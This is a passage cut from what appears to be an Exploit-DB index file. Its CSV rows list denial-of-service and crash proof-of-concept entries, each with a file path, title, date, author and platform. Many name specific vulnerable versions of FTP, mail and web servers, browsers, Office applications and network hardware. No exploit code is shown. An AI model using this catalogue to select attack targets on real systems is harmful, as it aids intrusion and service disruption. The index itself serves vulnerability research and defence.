DI-704P - Syslog.HTM Denial of Service",2003-05-26,"Chris R",hardware,dos, -22650,exploits/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST / HEAD Denial of Service",2003-05-26,euronymous,multiple,dos, -22653,exploits/windows/dos/22653.py,"Smadav Anti Virus 9.1 - Crash (PoC)",2012-11-12,"Mada R Perdhana",windows,dos, -22655,exploits/windows/dos/22655.txt,"Microsoft Publisher 2013 - Crash (PoC)",2012-11-12,coolkaveh,windows,dos, -22660,exploits/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos, -22666,exploits/windows/dos/22666.txt,"Softrex Tornado WWW-Server 1.2 - Buffer Overflow",2003-05-28,D4rkGr3y,windows,dos, -22667,exploits/windows/dos/22667.txt,"BaSoMail 1.24 - POP3 Server Denial of Service",2003-05-28,"Ziv Kamir",windows,dos, -22668,exploits/windows/dos/22668.txt,"BaSoMail 1.24 - SMTP Server Command Buffer Overflow",2003-05-28,"Ziv Kamir",windows,dos, -22670,exploits/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos, -22679,exploits/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,windows,dos, -22680,exploits/windows/dos/22680.txt,"IrfanView - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos, -22681,exploits/windows/dos/22681.txt,"IrfanView - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos, -22685,exploits/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow",2012-11-13,Vulnerability-Lab,windows,dos, -40411,exploits/windows/dos/40411.txt,"JCraft/JSch Java Secure Channel 0.1.53 - Recursive sftp-get Directory Traversal",2016-09-22,tintinweb,windows,dos, -22690,exploits/windows/dos/22690.c,"Activity Monitor 2002 2.6 - Remote Denial of Service",2003-05-29,"Luca Ercoli",windows,dos, -22694,exploits/windows/dos/22694.c,"Desktop Orbiter 2.0 1 - Resource Exhaustion (Denial of Service)",2003-05-30,"Luca Ercoli",windows,dos, -22700,exploits/linux/dos/22700.c,"MyServer 0.4.3 - GET Argument Buffer Overflow",2003-09-08,badpack3t,linux,dos, -22701,exploits/linux/dos/22701.c,"MyServer 0.5 - GET Argument Buffer Overflow",2003-09-08,badpack3t,linux,dos, -22706,exploits/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote 'Username' Format String",2003-06-02,"Luca Ercoli",windows,dos, -22707,exploits/windows/dos/22707.txt,"Novell Groupwise Internet Agent - LDAP BIND Request Overflow",2012-11-14,"Francis Provencher",windows,dos, -22718,exploits/windows/dos/22718.c,"Pi3Web 2.0.2 - SortName Buffer Overflow",2003-06-02,posidron,windows,dos, -22739,exploits/hardware/dos/22739.py,"Broadcom BCM4325 and BCM4329 Devices - Denial of Service",2012-11-15,CoreLabs,hardware,dos, -22749,exploits/novell/dos/22749.txt,"Novell Netware 6.0 / eDirectory 8.7 - HTTPSTK.NLM Remote Abend",2003-06-06,"Cheese Head",novell,dos, -22757,exploits/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service Vulnerabilities",2003-06-11,posidron,windows,dos, -22759,exploits/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Denial of Service",2003-06-12,"Ziv Kamir",windows,dos, -22774,exploits/windows/dos/22774.txt,"myServer 0.4.1 - Signal Handling Denial of Service",2003-06-14,LynX,windows,dos, -22780,exploits/windows/dos/22780.txt,"Mailtraq 2.1.0.1302 - Remote Format String SMTP Resource Consumption",2003-06-16,"Noam Rathaus",windows,dos, -22788,exploits/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,windows,dos, -22789,exploits/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos, -22790,exploits/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos, -22794,exploits/windows/dos/22794.txt,"Proxomitron Proxy Server - GET Remote Denial of Service",2003-06-17,dr_insane,windows,dos, -22796,exploits/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",linux,dos, -22797,exploits/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos, -22800,exploits/linux/dos/22800.txt,"Kerio MailServer 5.6.3 subscribe Module - Overflow",2003-06-18,"David F.Madrid",linux,dos, -22801,exploits/linux/dos/22801.txt,"Kerio MailServer 5.6.3 add_acl Module - Overflow",2003-06-18,"David F.Madrid",linux,dos, -22802,exploits/linux/dos/22802.txt,"Kerio MailServer 5.6.3 list Module - Overflow",2003-06-18,"David F.Madrid",linux,dos, -22803,exploits/linux/dos/22803.txt,"Kerio MailServer 5.6.3 do_map Module - Overflow",2003-06-18,"David F.Madrid",linux,dos, -22814,exploits/linux/dos/22814.txt,"GNU GNATS 3.0 02 - PR-Edit Command Line Option Heap Corruption",2003-06-21,"dong-h0un U",linux,dos, -22816,exploits/windows/dos/22816.txt,"Symantec Security Check RuFSI - ActiveX Control Buffer Overflow",2003-06-23,"Cesar Cerrudo",windows,dos, -22817,exploits/windows/dos/22817.pl,"MyServer 0.4.1 - Remote Denial of Service",2003-06-23,eip,windows,dos, -22822,exploits/windows/dos/22822.txt,"Compaq Web-Based Management Agent - Remote Stack Overflow Denial of Service",2003-06-23,"Ian Vitek",windows,dos, -22823,exploits/windows/dos/22823.txt,"Compaq Web-Based Management Agent - Access Violation Denial of Service",2003-06-23,"Ian Vitek",windows,dos, -22825,exploits/windows/dos/22825.c,"Armida Databased Web Server 1.0 - GET Remote Denial of Service",2003-06-23,posidron,windows,dos, -22831,exploits/freebsd/dos/22831.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (1)",2003-06-24,dodo,freebsd,dos, -22839,exploits/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos, -22844,exploits/windows/dos/22844.html,"Opera 7 - Denial of Service",2003-06-30,Operash,windows,dos, -22846,exploits/linux/dos/22846.pl,"Adobe Unix Acrobat Reader 4.0/5.0 - WWWLaunchNetscape Buffer Overflow",2003-07-01,"Paul Szabo",linux,dos, -22850,exploits/windows/dos/22850.txt,"Microsoft Office OneNote 2010 - Crash (PoC)",2012-11-20,coolkaveh,windows,dos, -22855,exploits/windows/dos/22855.txt,"Apple QuickTime 7.7.2 - Targa image Buffer Overflow",2012-11-20,"Senator of Pirates",windows,dos, -22859,exploits/multiple/dos/22859.txt,"Axis Print Server 6.15/6.20 - Web Interface Denial of Service",2003-07-03,"Ian Vitek",multiple,dos, -22875,exploits/windows/dos/22875.txt,"MyServer 0.4.2 - Malformed URI Denial of Service",2003-07-07,"Morning Wood",windows,dos, -22876,exploits/hardware/dos/22876.txt,"Canon GP300 - Remote GET Denial of Service",2003-07-07,"DOUHINE Davy",hardware,dos, -22878,exploits/windows/dos/22878.txt,"Adobe Reader 10.1.4 - JP2KLib&CoolType Crash (PoC)",2012-11-21,coolkaveh,windows,dos, -22897,exploits/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - GET Buffer Overflow",2003-07-07,posidron,linux,dos, -22899,exploits/windows/dos/22899.txt,"StarSiege Tribes Server - Denial of Service (1)",2003-06-10,st0ic,windows,dos, -22900,exploits/windows/dos/22900.php,"StarSiege Tribes Server - Denial of Service (2)",2003-07-14,st0ic,windows,dos, -22902,exploits/linux/dos/22902.sh,"lighttpd 1.4.31 - Denial of Service (PoC)",2012-11-22,t4c,linux,dos, -22904,exploits/linux/dos/22904.py,"TrouSerS - Denial of Service",2012-11-23,"Andy Lutomirski",linux,dos, -22945,exploits/windows/dos/22945.txt,"Savant Web Server 3.1 - Denial of Service",2003-07-21,dr_insane,windows,dos, -22947,exploits/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Denial of Service",2003-07-21,"David F.Madrid",hardware,dos, -22949,exploits/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - CGI2Perl.NLM Buffer Overflow",2003-07-23,"Uffe Nielsen",netware,dos, -22950,exploits/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",hardware,dos, -22952,exploits/linux/dos/22952.txt,"xfstt 1.2/1.4 - Memory Disclosure",2003-07-23,V9,linux,dos, -22957,exploits/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031)",2003-07-23,refdom,windows,dos, -22962,exploits/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - GET Denial of Service",2003-07-28,blackangels,hardware,dos, -22918,exploits/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow",2003-07-16,kf,unix,dos, -22920,exploits/unix/dos/22920.txt,"IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow",2003-07-16,kf,unix,dos, -22926,exploits/multiple/dos/22926.txt,"Witango Server 5.0.1.061 - Remote Cookie Buffer Overflow",2003-07-18,"Next Generation Software",multiple,dos, -22935,exploits/multiple/dos/22935.txt,"Websense Proxy - Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos, -22938,exploits/linux/dos/22938.py,"mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC)",2012-11-26,_ishikawa,linux,dos, -22970,exploits/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 - TCP Window Size Remote Denial of Service",2003-07-29,"Papa loves Mambo",windows,dos, -23003,exploits/windows/dos/23003.py,"UMPlayer Portable 0.95 - Crash (PoC)",2012-11-29,p3kok,windows,dos, -22978,exploits/hardware/dos/22978.txt,"Cisco IOS 10/11/12 - UDP Echo Service Memory Disclosure",2003-08-01,FX,hardware,dos, -22981,exploits/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,linux,dos, -22982,exploits/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,linux,dos, -40406,exploits/windows/dos/40406.txt,"Microsoft Office PowerPoint 2010 - Invalid Pointer Reference",2016-09-21,"Google Security Research",windows,dos, -22983,exploits/hardware/dos/22983.txt,"HP Compaq Insight Management Agent 5.0 - Format String",2003-08-04,mcw@wcd.se,hardware,dos, -22987,exploits/multiple/dos/22987.pl,"EveryBuddy 0.4.3 - Long Message Denial of Service",2003-08-05,"Noam Rathaus",multiple,dos, -22991,exploits/hardware/dos/22991.txt,"D-Link DI-704P - Long URL Denial of Service",2003-08-06,chris@cr-secure.net,hardware,dos, -22999,exploits/windows/dos/22999.pl,"Meteor FTP Server 1.2/1.5 - USER Memory Corruption",2003-08-08,zerash,windows,dos, -40405,exploits/multiple/dos/40405.txt,"Symantec RAR Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write",2016-09-21,"Google Security Research",multiple,dos, -23042,exploits/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 - Remote Denial of Service",2003-08-20,"real Remoter",windows,dos, -23048,exploits/linux/dos/23048.txt,"Srcpd 2.0 - Remote Integer Overflow",2003-08-21,Over_G,linux,dos, -23050,exploits/multiple/dos/23050.txt,"Avant Browser 8.0.2 - 'HTTP Request' Buffer Overflow",2003-08-21,nimber@designer.ru,multiple,dos, -23051,exploits/multiple/dos/23051.txt,"WapServ 1.0 - Denial of Service",2003-08-22,"Blue eyeguy4u",multiple,dos, -23053,exploits/windows/dos/23053.pl,"Vpop3d - Remote Denial of Service",2003-08-22,daniels@legend.co.uk,windows,dos, -23056,exploits/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service",2003-08-25,"Luca Ercoli",windows,dos, -23075,exploits/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun (PoC)",2012-12-02,kingcope,linux,dos, -23076,exploits/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun (PoC)",2012-12-02,kingcope,linux,dos, -23078,exploits/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,linux,dos, -23086,exploits/windows/dos/23086.txt,"Yahoo! Messenger 4.0/5.0 - Remote Denial of Service",2003-09-01,diman,windows,dos, -23087,exploits/hardware/dos/23087.c,"Check Point Firewall-1 4.x - SecuRemote Internal Interface Address Information Leakage",2001-07-17,"Jim Becher",hardware,dos, -23088,exploits/windows/dos/23088.pl,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (1)",2003-09-02,_6mO_HaCk,windows,dos, -23089,exploits/windows/dos/23089.c,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (2)",2003-09-02,WARL0RD,windows,dos, -23090,exploits/windows/dos/23090.asm,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (3)",2003-09-02,"Igor Franchuk",windows,dos, -23101,exploits/windows/dos/23101.c,"Microsoft Windows 98 - Fragmented UDP Flood Denial of Service",2003-09-04,WARL0RD,windows,dos, -23102,exploits/windows/dos/23102.pl,"FoxWeb 2.5 - PATH_INFO Remote Buffer Overrun",2003-06-27,pokleyzz,windows,dos, -23107,exploits/windows/dos/23107.txt,"Opera Web Browser 12.11 - Crash (PoC)",2012-12-03,coolkaveh,windows,dos, -23112,exploits/linux/dos/23112.txt,"IBM DB2 db2dart - Buffer Overflow",2003-09-18,"Martinez Kuhn",linux,dos, -23116,exploits/linux/dos/23116.pl,"Mah-Jong 1.4/1.6 - Server Remote Denial of Service",2003-09-07,jsk,linux,dos, -23117,exploits/windows/dos/23117.txt,"FTP Desktop 3.5 - Banner Parsing Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos, -23118,exploits/windows/dos/23118.txt,"FTP Desktop 3.5 - FTP 331 Server Response Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos, -23124,exploits/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow",2003-09-08,"Luigi Auriemma",windows,dos, -23130,exploits/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 - 'WWW.exe' Denial of Service",2003-09-10,"Phuong Nguyen",windows,dos, -23138,exploits/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow",2003-09-10,"Frank DENIS",linux,dos, -23139,exploits/windows/dos/23139.txt,"myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow",2003-09-12,Moran,windows,dos, -23142,exploits/multiple/dos/23142.txt,"WideChapter 3.0 - HTTP Request Buffer Overflow",2003-09-15,"Bahaa Naamneh",multiple,dos, -23145,exploits/windows/dos/23145.c,"Ipswitch Imail Server 5.0 - SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,windows,dos, -23146,exploits/windows/dos/23146.c,"Alt-N MDaemon Server 2.71 SP1 - SMTP HELO Argument Buffer Overflow",1999-03-10,Rootshell,windows,dos, -23150,exploits/windows/dos/23150.c,"ChatZilla 0.8.23 - Remote Denial of Service",2003-09-15,D4rkGr3y,windows,dos, -23165,exploits/windows/dos/23165.txt,"Sun Java 1.x - XML Document Nested Entity Denial of Service",2003-09-22,"Sun Microsystems",windows,dos, -23166,exploits/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow",2003-09-21,"Bahaa Naamneh",windows,dos, -23167,exploits/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos, -23169,exploits/windows/dos/23169.pl,"WzdFTPD 0.1 rc5 - Login Remote Denial of Service",2003-09-23,"Moran Zavdi",windows,dos, -23170,exploits/linux/dos/23170.c,"ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun",2003-09-23,netris,linux,dos, -23172,exploits/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 - SQL-GW Connection Denial of Service",2003-09-24,"Oliver Heinz & Thomas Neuderth",linux,dos, -23177,exploits/windows/dos/23177.txt,"Nvidia Install Application 2.1002.85.551 - 'NVI2.dll' Unicode Buffer Overflow (PoC)",2012-12-06,LiquidWorm,windows,dos, -23181,exploits/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",multiple,dos, -23190,exploits/hardware/dos/23190.pl,"SMC Router 1.2x - Random UDP Packet Denial of Service",2003-09-26,_6mO_HaCk,hardware,dos, -23191,exploits/windows/dos/23191.txt,"Savant Web Server 3.1 - Page Redirect Denial of Service",2003-09-26,"Phuong Nguyen",windows,dos, -23200,exploits/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 - IRC Client Remote Buffer Overflow",2003-09-30,"Luigi Auriemma",linux,dos, -23201,exploits/windows/dos/23201.txt,"VideoLAN VLC Media Player 2.0.4 - '.swf' Crash (PoC)",2012-12-07,coolkaveh,windows,dos, -23215,exploits/windows/dos/23215.html,"Microsoft Internet Explorer 6 - Absolute Position Block Denial of Service",2003-10-03,"Nick Johnson",windows,dos, -23216,exploits/windows/dos/23216.txt,"Microsoft Word 97/98/2002 - Malformed Document Denial of Service",2003-10-03,"Bahaa Naamneh",windows,dos, -23231,exploits/multiple/dos/23231.txt,"Medieval Total War 1.0/1.1 - nickname Denial of Service",2003-10-07,"Luigi Auriemma",multiple,dos, -23234,exploits/windows/dos/23234.c,"Centrinity FirstClass HTTP Server 5.50/5.77/7.0/7.1 - Long Version Field Denial of Service",2003-10-08,I2S-LaB,windows,dos, -23235,exploits/windows/dos/23235.txt,"OpenOffice 1.0.1 - Remote Access Denial of Service",2003-10-08,"Marc Schoenefeld",windows,dos, -23236,exploits/hp-ux/dos/23236.txt,"HP-UX 11 CDE DTPrintInfo - Display Environment Variable Buffer Overflow",2003-10-08,"Davide Del Vecchio",hp-ux,dos, -23239,exploits/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos, -23240,exploits/windows/dos/23240.pl,"mIRC 6.1 - 'DCC SEND' Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos, -23241,exploits/windows/dos/23241.pl,"mIRC 6.1 - 'DCC SEND' Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos, -23242,exploits/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos, -23245,exploits/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos, -23246,exploits/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 - Integer Overflow",2012-12-09,beford,windows,dos, -23248,exploits/android/dos/23248.txt,"Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)",2012-12-09,G13,android,dos, -23254,exploits/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",windows,dos, -23263,exploits/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF - Malformed Server Name Heap Corruption",2003-10-20,@stake,multiple,dos, -23267,exploits/windows/dos/23267.txt,"Atrium Software Mercur MailServer 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos, -23273,exploits/windows/dos/23273.html,"Microsoft Internet Explorer 6 - Scrollbar-Base-Color Partial Denial of Service",2003-10-22,"Andreas Boeckler",windows,dos, -23274,exploits/linux/dos/23274.pl,"Coreutils 4.5.x - LS Width Argument Integer Overflow",2003-10-22,druid,linux,dos, -23276,exploits/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention",2003-10-22,"Last Stage of Delirium",multiple,dos, -23388,exploits/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/Denial of Service",2003-11-19,3APA3A,windows,dos, -23389,exploits/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service",2003-11-19,anonymous,openbsd,dos, -23279,exploits/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos, -23280,exploits/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos, -23314,exploits/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos, -23288,exploits/windows/dos/23288.txt,"IrfanView 4.33 - 'IMXCF.dll' Plugin Code Execution",2012-12-11,beford,windows,dos, -23292,exploits/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service",2003-10-26,"Marc Schoenefeld",multiple,dos, -23293,exploits/windows/dos/23293.txt,"Yahoo! Messenger 5.6 - File Transfer Buffer Overrun",2003-10-27,"Hat-Squad Security Team",windows,dos, -23305,exploits/linux/dos/23305.c,"thttpd 2.2x - 'defang' Remote Buffer Overflow (PoC)",2003-10-27,"Joel Soderberg",linux,dos, -23310,exploits/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",windows,dos, -23311,exploits/php/dos/23311.txt,"E107 - 'Chatbox.php' Denial of Service",2003-10-29,Blademaster,php,dos, -23325,exploits/multiple/dos/23325.c,"BRS Webweaver 1.06 - HTTPd 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos, -23337,exploits/windows/dos/23337.c,"Avaya Argent Office - DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos, -23339,exploits/openbsd/dos/23339.c,"OpenBSD 2.x/3.x - Local Malformed Binary Execution Denial of Service",2003-11-04,"Georgi Guninski",openbsd,dos, -23347,exploits/linux/dos/23347.txt,"IBM DB2 - 'db2start' Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos, -23348,exploits/linux/dos/23348.txt,"IBM DB2 - 'db2stop' Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos, -23349,exploits/linux/dos/23349.txt,"IBM DB2 - 'db2govd' Command Line Argument Local Overflow",2003-11-07,SNOSoft,linux,dos, -23361,exploits/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos, -23374,exploits/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 - Spoofed Attachment Line Denial of Service",2003-11-12,"Paul Szabo",windows,dos, -23375,exploits/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 - Remote Denial of Service",2003-11-12,"Jonny Robertson",linux,dos, -23390,exploits/multiple/dos/23390.txt,"EffectOffice Server 2.6 - Remote Service Buffer Overflow",2003-11-20,D_BuG,multiple,dos, -23391,exploits/linux/dos/23391.txt,"FreeRadius 0.x/1.1.x - Tag Field Heap Corruption",2003-11-20,"Evgeny Legerov",linux,dos, -23392,exploits/openbsd/dos/23392.c,"OpenBSD 3.3/3.4 - semctl/semop Local Unexpected Array Indexing",2003-11-21,anonymous,openbsd,dos, -43151,exploits/windows/dos/43151.html,"Microsoft Edge - 'Object.setPrototypeOf' Memory Corruption",2017-11-16,"Google Security Research",windows,dos, -23393,exploits/linux/dos/23393.c,"GEdit 2.0/2.2 - Large IOStream File Memory Corruption",2003-11-23,MegaHz,linux,dos, -23394,exploits/hardware/dos/23394.c,"Thomson Cablemodem TCM315 - Denial of Service",2003-11-24,"Shell security group",hardware,dos, -23412,exploits/windows/dos/23412.pl,"EZPhotoShare 1.0/1.1 - Memory Corruption",2003-12-03,Winter-Smith,windows,dos, -23452,exploits/linux/dos/23452.txt,"Tcpdump 3.x - L2TP Parser Remote Denial of Service",2003-12-20,"Przemyslaw Frasunek",linux,dos, -23427,exploits/linux/dos/23427.txt,"Totem Movie Player 3.4.3 (Ubuntu) - Stack Corruption",2012-12-16,coolkaveh,linux,dos, -23431,exploits/multiple/dos/23431.pl,"SX Design sipd 0.1.2 - Remote Denial of Service",2003-12-11,storm,multiple,dos, -23438,exploits/linux/dos/23438.pl,"X-Chat 2.0.6 - Remote Denial of Service",2003-12-15,"Stefan Hecker",linux,dos, -23442,exploits/osx/dos/23442.txt,"Apple Mac OSX 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,osx,dos, -23444,exploits/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String",2003-12-16,storm,multiple,dos, -23460,exploits/php/dos/23460.pl,"ProjectForum 8.4.2.1 - Find Request Denial of Service",2003-12-22,"Peter Winter-Smith",php,dos, -23468,exploits/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 - PASS Command Remote Buffer Overflow",2003-12-23,storm,windows,dos, -23469,exploits/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash (PoC)",2012-12-18,coolkaveh,windows,dos, -23480,exploits/windows/dos/23480.txt,"Surfboard HTTPd 1.1.9 - Remote Buffer Overflow",2003-12-26,"decka trash",windows,dos, -23496,exploits/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash (PoC)",2012-12-19,"Lizhi Wang",windows,dos, -23693,exploits/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos, -23501,exploits/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos, -23504,exploits/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp '.CHM' File Execution (MS03-004)",2003-12-30,"Arman Nayyeri",windows,dos, -23505,exploits/osx/dos/23505.c,"Apple Mac OSX 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos, -23506,exploits/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",windows,dos, -23508,exploits/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 - Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",hardware,dos, -23512,exploits/windows/dos/23512.txt,"Surfnet 1.31 - CMD_CREDITCARD_CHARGE Denial of Service",2004-01-02,Rift_XT,windows,dos, -23692,exploits/windows/dos/23692.txt,"Sami FTP Server 1.1.3 - Invalid Command Argument Local Denial of Service",2004-02-13,"intuit e.b.",windows,dos, -23523,exploits/linux/dos/23523.c,"gdb (GNU debugger) 7.5.1 - Null Pointer Dereference",2012-12-20,nitr0us,linux,dos, -23524,exploits/multiple/dos/23524.c,"IDA Pro 6.3 - Crash (PoC)",2012-12-20,nitr0us,multiple,dos, -23530,exploits/windows/dos/23530.c,"Kroum Grigorov KpyM Telnet Server 1.0 - Remote Denial of Service",2004-01-07,NoRpiuS,windows,dos, -23534,exploits/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service",2004-01-09,badpack3t,windows,dos, -23538,exploits/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 - Remote Denial of Service",2004-01-12,dr_insane,windows,dos, -23539,exploits/linux/dos/23539.txt,"Mabry Software FTPServer/X 1.0 - Controls Format String",2004-01-12,"Jan-Olivier Fillols",linux,dos, -23540,exploits/freebsd/dos/23540.c,"KAME Racoon - 'Initial Contact' SA Deletion",2004-01-14,"Thomas Walpuski",freebsd,dos, -23543,exploits/multiple/dos/23543.txt,"Vicomsoft RapidCache Server 2.0/2.2.6 - Host Argument Denial of Service",2004-01-15,"Peter Winter-Smith",multiple,dos, -23556,exploits/multiple/dos/23556.txt,"GetWare Web Server Component - Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",multiple,dos, -23565,exploits/windows/dos/23565.txt,"Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos, -23567,exploits/windows/dos/23567.txt,"Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos, -23568,exploits/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos, -23569,exploits/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos, -23574,exploits/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos, -23584,exploits/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent - POST Buffer Mismanagement",2004-01-22,cyber_flash,windows,dos, -23590,exploits/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos, -23595,exploits/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos, -23602,exploits/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER 